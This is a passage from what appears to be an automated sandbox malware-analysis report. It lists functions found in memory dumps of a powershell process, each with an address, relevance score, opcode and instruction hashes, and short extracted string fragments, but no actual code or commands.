                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac69e815c84e30bff7f3a44754278ef8a220fb62b84b2201b37daadea0240d65
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6E02B3170456456CB1486ACF4014F9FBE2CFC9220F04847FD546A7294C63228968791
                                                                                                                                                                                                                                                                                                                Function 04E99188 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: dae9b03b8259ea9c079027dc35804e3e0f44c8b32681affb5f8e40840b4e3b6e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9f29c8ab1c4ec989a1ca3ceec5ec0c1eb9825e9dbacab7ecbcf12a2c45a06f90
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dae9b03b8259ea9c079027dc35804e3e0f44c8b32681affb5f8e40840b4e3b6e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84F06D709007044FD764DFB9D49C39ABBE5FB44314F00442ED54ED3380DB3968858B90
                                                                                                                                                                                                                                                                                                                Function 04E9AFB0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3c06ef8514788a2ac660e2647d372c9c29b7e15a6793d5a028fd242e0487eaa6
                                                                                                                                                                                                                                                                                                                • Instruction ID: 52221da7ef07bff87dc68116723be30879a0005b8292799c547874ba378a1acb
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c06ef8514788a2ac660e2647d372c9c29b7e15a6793d5a028fd242e0487eaa6
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69E0C23670C3D41F9F5A95AEA41091A3BE69FCA26031980BFE408CF242DC12CC0643A1
                                                                                                                                                                                                                                                                                                                Function 04E98978 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7d72c3e962514f3b460b2232d61cc0088b8a9bf1f27d2636b044061e2f3e6e55
                                                                                                                                                                                                                                                                                                                • Instruction ID: 134c0efd2936ceeb270bc2dcb5824b14b2dc112ce0fb99e317b1e2ca8fdcdba7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d72c3e962514f3b460b2232d61cc0088b8a9bf1f27d2636b044061e2f3e6e55
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18E02635304A104BCF097775A40C2AE7A96EBC4768F04002ED60A83381CF782C0697D6
                                                                                                                                                                                                                                                                                                                Function 04E99570 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 33bfc1d16a419a4e3a88f2f80864d62880a44e38e88b03530a40da6f2bc0a20c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 22da5c4bd7511f6e4eed9dad479b47c0f034a9ebc8924dcb5b3a3a965ff28f06
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33bfc1d16a419a4e3a88f2f80864d62880a44e38e88b03530a40da6f2bc0a20c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6D05E5276112527AE9836BA180067BA5CF9BC64AE70510BAAA08C73D2ED50EC0543F2
                                                                                                                                                                                                                                                                                                                Function 04E9DEB0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                                                                                                • Instruction ID: 076db25f3704b32b01eb65450a187bf0def744e77887cd93108ad0966df09207
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE08631B0401497CB0899ADD8118D9F7A6DBCC220F04847AD91AA7380DA326D168691
                                                                                                                                                                                                                                                                                                                Function 04E9DE60 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 95039a97cc69886c9be1eae8cf393197b94ab10b8da99e57c300cee60b87eb7f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6d84668a17d4b8a395db572930f44bc591b975a02b85cb0028e70530b931c0f7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95039a97cc69886c9be1eae8cf393197b94ab10b8da99e57c300cee60b87eb7f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AE0C231700A250B8621A66EAC1089FB7DBDFC86B5310403EE01DC7750DE60EC058BE5
                                                                                                                                                                                                                                                                                                                Function 04E98802 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: ca7291cc8e0612854abb9b67216530af2043bcc5ff83b135439ae761214e8888
                                                                                                                                                                                                                                                                                                                • Instruction ID: c5aa0fb69927ac9a2846ba2598b621175396bbc11be72f5a7e789ef76d0c6452
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca7291cc8e0612854abb9b67216530af2043bcc5ff83b135439ae761214e8888
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE0483598D28A8FCB05DB78F44A4BEBFF0EF06260F04419ED945ABA52D63118D5DF81
                                                                                                                                                                                                                                                                                                                Function 04E98738 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: eb2f3f31fd1fc39ebecc4bf2005e2c31babd138fbe279d930f0bd17e782cc9c0
                                                                                                                                                                                                                                                                                                                • Instruction ID: d37d218530a6a807b57907fdf7b3a54c44242aa7ca0d69615f939be60db763e1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb2f3f31fd1fc39ebecc4bf2005e2c31babd138fbe279d930f0bd17e782cc9c0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31E01A319491898BCF09EBA4F41A8FD7F70EE05215F04009DD99696192EB21098ACFC1
                                                                                                                                                                                                                                                                                                                Function 04E9F620 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 50e4ebf643387ad11c222cd2fe595c7bcbb1db4bb748461307c0ebbd12ff637e
                                                                                                                                                                                                                                                                                                                • Instruction ID: a91802d64ca9c946d77661f4beb47a5c34b2a7580f2fa7f8d32890b4a8b9530d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50e4ebf643387ad11c222cd2fe595c7bcbb1db4bb748461307c0ebbd12ff637e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13E01A70E4414A9E8B80EFBCC4415A9FFF0EB49200B2589AEC949D7302E2328A11CB81
                                                                                                                                                                                                                                                                                                                Function 04E9F630 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 740265b64fe48ab082cdc763deaab140d7696f2391b6748245e9a2ad9fb6f93c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12D062B0D042099F8780DFADC94156DFBF4EF48204F5085BA8919D7351F7319A128BD1
                                                                                                                                                                                                                                                                                                                Function 04E98748 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: f5aec26f9927e2ca402ea7b2b87a8d99b716e2703ab098cb668e068a02bfaccf
                                                                                                                                                                                                                                                                                                                • Instruction ID: b121b0f3fb128bc91ff27746f1fdb074931ea31b526e2564479c1b386cf79981
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5aec26f9927e2ca402ea7b2b87a8d99b716e2703ab098cb668e068a02bfaccf
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30D067319045098FCF08EBA5E85A4BDBB74FB14301F40416DD91792191EF312A5ADEC5
                                                                                                                                                                                                                                                                                                                Function 04E98810 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 896bce8d218155512521ceb3a9655a64e1b2114d5e48eb6949db9a47a2a5b9a5
                                                                                                                                                                                                                                                                                                                • Instruction ID: bdfe633b5e08f6a66432a18a73e9c2e28f345596ebfa22fe835a44275fa6925f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 896bce8d218155512521ceb3a9655a64e1b2114d5e48eb6949db9a47a2a5b9a5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62D01734A0820A8FCB08EFA4E44687EBBB5EB45200F008169DD0A93390EA306C05DFC1
                                                                                                                                                                                                                                                                                                                Function 04E97EA0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 775ced1e8a7e410ca2040cdefb2bd9404161d63c685c561a6cbb9d699895e355
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8d908e52682ce5147946ea3fc6ff98ac5b26901d0db4ae67fc2648d3ebf234cf
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 775ced1e8a7e410ca2040cdefb2bd9404161d63c685c561a6cbb9d699895e355
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19C0122158E3D00EDF03933848496053FB02E6322930840DAD2828F16288A88804C762
                                                                                                                                                                                                                                                                                                                Function 04E97938 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4818e3c994f32cec4ae9abd05f9b83545934aaa2b4e669e17e139cd18f56c1b7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 14dce2192b9247ffc37a101850e88d70c6c2d78fd17466700b20a0c4ee903414
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4818e3c994f32cec4ae9abd05f9b83545934aaa2b4e669e17e139cd18f56c1b7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDC08C30004309DF86483FB59044824332AFE8022974085ACE06A162939F22E980CA88
                                                                                                                                                                                                                                                                                                                Function 04E97940 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7cb51d6ea47c25bec1a3f0b83861a847862f900ba5791acfadd2f6a191c7f9cf
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b001965dd7d1427c735a0c8bd0bc4ba78560d65c50244c47c12b4e8ca8f6f74
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cb51d6ea47c25bec1a3f0b83861a847862f900ba5791acfadd2f6a191c7f9cf
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47B092300497099FC2887F79A4448147329FE4522978004ECE54E0B2939F36E881CA59

                                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                                Function 079C1CB8 Relevance: 21.6, Strings: 17, Instructions: 398COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: $cMi$4']q$4']q$4']q$4']q$84Xj$84Xj$pi"i$tP]q$tP]q$J[j$J[j$J[j$J[j$J[j$rZj$rZj
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3604267704
                                                                                                                                                                                                                                                                                                                • Opcode ID: bcd1e38e37bc361c22d89d63c58f872fce673fe670b4ed9d2f1c283705ee4c30
                                                                                                                                                                                                                                                                                                                • Instruction ID: a6d98496e5be32395065a4ae0fce819dcfcd29b6a95e084f0f3f576b42e530ab
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcd1e38e37bc361c22d89d63c58f872fce673fe670b4ed9d2f1c283705ee4c30
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CD137B1B4421A8FCF24DB6898006AABBFAAFC5214F14C47FD545CB256DB31D885C7A3
                                                                                                                                                                                                                                                                                                                Function 079C2348 Relevance: 7.6, Strings: 6, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: pi"i$pi"i$J[j$J[j$J[j$J[j
                                                                                                                                                                                                                                                                                                                • API String ID: 0-941437480
                                                                                                                                                                                                                                                                                                                • Opcode ID: bff3a22ae2346e73db704193fbcd3e5bfe2ad72bf22e5e799348531a83928004
                                                                                                                                                                                                                                                                                                                • Instruction ID: 996f9175e2793eb2af3c8dc2519f782df8fea5476094627a9c4d5d1fde35bb5d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bff3a22ae2346e73db704193fbcd3e5bfe2ad72bf22e5e799348531a83928004
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E41E3F15083969FCF22CF2984507A6BBF9BB46228F1984AFD4548F152C738D884C7A3
                                                                                                                                                                                                                                                                                                                Function 079C2268 Relevance: 7.6, Strings: 6, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: TcMi$lcMi$J[j$J[j$J[j$J[j
                                                                                                                                                                                                                                                                                                                • API String ID: 0-807173668
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4daa67e19864c445e579027a467db84c7761cbbe0deb8c4db352a9fb6761ebad
                                                                                                                                                                                                                                                                                                                • Instruction ID: c16b915a82d5072549cbdd122281b52c9a998f2b5533a386024a247684121dd3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4daa67e19864c445e579027a467db84c7761cbbe0deb8c4db352a9fb6761ebad
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21F7A164D3D15FC72787285820A627FB96F97214B0A85DFD080CF697C9349C89C3B3
                                                                                                                                                                                                                                                                                                                Function 04E97A20 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: tMZj$`^q$`^q$`^q$`^q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1118251408
                                                                                                                                                                                                                                                                                                                • Opcode ID: 28ac8929aec83066e8a422156489d2827987420200a8b7cf6d637f894f72b040
                                                                                                                                                                                                                                                                                                                • Instruction ID: 986ae0530ef7ea9aa749b087fdbacd8987b3a858ba6dfc47efa07f2f94bc3062
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28ac8929aec83066e8a422156489d2827987420200a8b7cf6d637f894f72b040
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15B1A374E002099FDB54DFA9D590A9EFBF2FF88304F109629D819AB355DB30A949CF90
                                                                                                                                                                                                                                                                                                                Function 04E97A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: tMZj$`^q$`^q$`^q$`^q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1118251408
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4b418e7fe2309a2be6b818e949695117786883c4b8b219c86939ac15d3f6bd43
                                                                                                                                                                                                                                                                                                                • Instruction ID: 70581828fc2e684d1209c22f5d95f2afef4b1204b8c70a2bb5e93df35345e72a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b418e7fe2309a2be6b818e949695117786883c4b8b219c86939ac15d3f6bd43
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DB19474E002099FDB54DFA9D590A9EFBF2FF88304F109629D819AB355DB30A945CF90
                                                                                                                                                                                                                                                                                                                Function 079C0990 Relevance: 6.4, Strings: 5, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: fbq$4']q$4']q$rZj$rZj
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1065903908
                                                                                                                                                                                                                                                                                                                • Opcode ID: c83330478316e452c3f083d926d1e9bce57442efdcbd7998a7e359e9dbe45b96
                                                                                                                                                                                                                                                                                                                • Instruction ID: 031c2d6d0c048b6e1eb2a907b2be76f49fd7525d92c869cc165f59836720079e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c83330478316e452c3f083d926d1e9bce57442efdcbd7998a7e359e9dbe45b96
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5413870B00315CFCF24DB6C98146AABBE6AF85218F0884BED545CB251DA31CC85C7E3
                                                                                                                                                                                                                                                                                                                Function 079C03E0 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
